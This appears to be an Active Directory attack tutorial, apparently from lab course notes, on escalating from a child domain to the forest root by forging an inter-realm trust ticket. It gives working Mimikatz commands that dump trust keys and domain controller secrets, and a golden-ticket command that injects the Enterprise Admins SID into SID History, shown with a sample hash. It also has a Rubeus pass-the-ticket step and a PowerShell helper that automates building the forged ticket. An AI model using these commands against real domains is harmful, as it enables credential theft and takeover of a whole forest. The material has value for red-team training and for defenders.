Using Trust Tickets
Child to Parent using Trust Tickets
We will extract the trust key shared between the child and parent domains, then forge an inter-realm TGT (a "trust ticket") that injects the parent's Enterprise Admins SID into SID History. This works against a parent-child trust because SID filtering is not enforced on intra-forest trusts by default.
To extract the trust key, look for the [In] key of the trust from child to parent. Any of the following extracts it from the child DC:
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
OR run DCSync to extract
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'
OR extract all the secrets from DC
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Now we can forge the inter-realm TGT using the trust key obtained. Note: unless explicitly configured, AES is not supported across trusts (within or across forests); only RC4 is, so use the RC4 (NTLM) hash of the trust key.
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /rc4:e9ab2e57f6397c19b62476e98e9521ac /service:krbtgt /target:moneycorp.local /ticket:C:\AD\Tools\trust_tkt.kirbi" "exit"
Parameters of the command:

kerberos::golden   The mimikatz module
/domain            FQDN of the current (child) domain
/sid               SID of the current (child) domain
/sids              SID of the Enterprise Admins group of the parent domain (RID 519)
/rc4               RC4 hash of the trust key
/user              User to impersonate
/service           Target service in the parent domain (krbtgt for an inter-realm TGT)
/target            FQDN of the parent domain
/ticket            Path where the ticket is to be saved (e.g., C:\AD\Tools\trust_tkt.kirbi)
Now we can present the forged inter-realm TGT to the parent DC and request a TGS for a service (CIFS) on the forest root DC, then inject it into the current session:
Rubeus.exe asktgs /ticket:C:\AD\Tools\trust_tkt.kirbi /service:cifs/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
We can now access forest root DC.
ls \\mcorp-dc.moneycorp.local\c$
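The step most often done wrong in this procedure is copying the two SIDs by hand. The PowerShell helper below is an added example, not code from the original page: it resolves the child domain SID and the parent Enterprise Admins SID from a domain-joined host, validates the trust key and the RID, builds the kerberos::golden argument string, and afterwards checks that the CIFS ticket actually landed in the session. It assumes the lab names used on this page (dcorp / dollarcorp.moneycorp.local as child, mcorp / moneycorp.local as parent); the function names are hypothetical.

```powershell
# Added helper (not part of the original page). Assumes a host joined to the
# child domain that can resolve names in the parent domain; names are the lab's.

function Get-AccountSid {
    # Translate DOMAIN\Account into its SID string via LSA lookup.
    param([Parameter(Mandatory)][string]$Account)
    $nt = New-Object System.Security.Principal.NTAccount($Account)
    return $nt.Translate([System.Security.Principal.SecurityIdentifier]).Value
}

function Get-DomainSid {
    # The domain SID is a well-known account's SID with the trailing RID removed.
    # krbtgt (RID 502) exists in every domain, so it is a safe anchor.
    param([Parameter(Mandatory)][string]$NetbiosName)
    return ((Get-AccountSid "$NetbiosName\krbtgt") -replace '-\d+$', '')
}

function New-TrustTicketArgs {
    # Assemble the kerberos::golden arguments for a child-to-parent trust ticket.
    param(
        [Parameter(Mandatory)][string]$TrustKeyRc4,          # [In] key from lsadump::trust
        [string]$ChildDomain   = 'dollarcorp.moneycorp.local',
        [string]$ChildNetbios  = 'dcorp',
        [string]$ParentDomain  = 'moneycorp.local',
        [string]$ParentNetbios = 'mcorp',
        [string]$User          = 'Administrator',
        [string]$TicketPath    = 'C:\AD\Tools\trust_tkt.kirbi'
    )
    # Only RC4 is usable across the trust by default: the key must be a 16-byte NT hash.
    if ($TrustKeyRc4 -notmatch '^[0-9a-fA-F]{32}$') {
        throw "Trust key must be the 32-hex-char RC4 hash, got: $TrustKeyRc4"
    }
    $childSid = Get-DomainSid $ChildNetbios
    $eaSid    = Get-AccountSid "$ParentNetbios\Enterprise Admins"
    # Guard against resolving the wrong group (Enterprise Admins is always RID 519).
    if ($eaSid -notmatch '-519$') {
        throw "Resolved SID does not end in RID 519 (Enterprise Admins): $eaSid"
    }
    return ('kerberos::golden /user:{0} /domain:{1} /sid:{2} /sids:{3} /rc4:{4} ' +
            '/service:krbtgt /target:{5} /ticket:{6}') -f
            $User, $ChildDomain, $childSid, $eaSid, $TrustKeyRc4.ToLower(),
            $ParentDomain, $TicketPath
}

function Test-ServiceTicketPresent {
    # After Rubeus asktgs /ptt, confirm the CIFS ticket for the root DC is cached.
    param([string]$Spn = 'cifs/mcorp-dc.moneycorp.local')
    $cache = klist 2>$null | Out-String
    return [bool]($cache -match [regex]::Escape($Spn))
}

# Usage (trust key value below is the one shown on this page):
$args = New-TrustTicketArgs -TrustKeyRc4 'e9ab2e57f6397c19b62476e98e9521ac'
Write-Host "BetterSafetyKatz.exe `"$args`" `"exit`""
# ... run BetterSafetyKatz and Rubeus asktgs /ptt as shown above, then:
if (-not (Test-ServiceTicketPresent)) {
    Write-Warning 'No CIFS ticket for mcorp-dc in the cache; check the trust key direction ([In]) and the SIDs.'
}
```

If Test-ServiceTicketPresent returns $false after the asktgs step, the usual causes are using the [Out] key instead of the [In] key, a stale trust key (it rotates roughly every 30 days), or a mismatched /sid for the child domain; the helper rules out the last one by resolving it from krbtgt rather than trusting a pasted value.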